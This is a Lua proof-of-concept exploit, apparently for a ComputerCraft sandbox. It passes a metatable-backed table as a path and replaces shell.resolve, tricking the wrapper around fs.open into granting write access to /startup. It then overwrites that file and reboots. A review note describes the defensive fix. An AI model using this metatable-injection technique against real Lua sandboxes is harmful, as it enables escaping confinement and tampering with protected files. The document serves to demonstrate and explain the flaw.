--[[
    Metatable Injection                     Trystan Cannon
                                            12 March 2013

    Proof of concept for a sandbox whose file API assumes that every
    path it receives is a real string. A table with a metatable is
    passed in place of the string, so the method calls and the
    concatenation performed on "path" run this script's functions
    rather than the string library.

    This is the wrapper the script is written against:

    fs.open = function(path, mode)
        path = shell.resolve(path);

        if(mode == 'r')then
            if(path:sub(1,13)=="rom/programs/")then
                return fsOpen(path, mode);
            end
        end

        if(path:sub(1,iVirtualDir)==virtualDir)then
            return fsOpen(path, mode);
        else
            return fsOpen(virtualDirCurrent.."/"..path, mode);
        end
        return nil;
    end

    Review note: the wrapper never checks type(path) == "string" before
    calling path:sub() or using "..", and it looks up shell.resolve at
    call time from a table that this script is able to overwrite. A
    wrapper that rejects non-string paths up front and calls a resolver
    captured in a private local never invokes these metamethods.
]]--

--======================================================================
-- Variables:

-- File the script tries to obtain a write handle on.
local targetPath = "/startup"

-- Saved reference to the genuine resolver; ordinary strings are still
-- forwarded to it by the replacement installed further down.
local originalResolve = shell.resolve

-- Value handed back by the fake sub(). It is chosen so that the wrapper's
-- comparison against its virtual directory prefix does not match.
local decoyPrefix = "Not the virtual directory."

-- Method table reached through __index when the wrapper calls
-- path:sub(...) or path:len() on the proxy object.
local StringBomb = {}

-- Ignores the requested range and always returns the decoy string.
function StringBomb.sub(self)
    return decoyPrefix
end

-- Real strings never report a negative length, so -1 serves as the
-- marker the replaced shell.resolve uses to recognise the proxy.
function StringBomb.len(self)
    return -1
end

-- Metatable shared by proxy objects: method lookups go to StringBomb,
-- and any ".." involving a proxy yields targetPath, whatever the other
-- operand is.
StringBomb.metatable = {
    __index = StringBomb,
    __concat = function(_left, _right)
        return targetPath
    end
}
--======================================================================

--======================================================================
-- Function replacement:

-- Resolver shim: a proxy (identified by len() == -1) is returned
-- untouched so it reaches the wrapper still as a table; everything else
-- is passed to the saved resolver.
function shell.resolve(path)
    if path:len() ~= -1 then
        return originalResolve(path)
    end

    return path
end
--======================================================================

--======================================================================
-- Main:

-- Build the proxy and hand it to fs.open where a path string is expected.
local pathProxy = setmetatable({}, StringBomb.metatable)

local handle = fs.open(pathProxy, 'w')
handle.write("print ('Startup accessed.')")
handle.close()

-- Report the result, then restart.
print("Startup overwritten. Rebooting.")
sleep(0.5)
os.reboot()
--======================================================================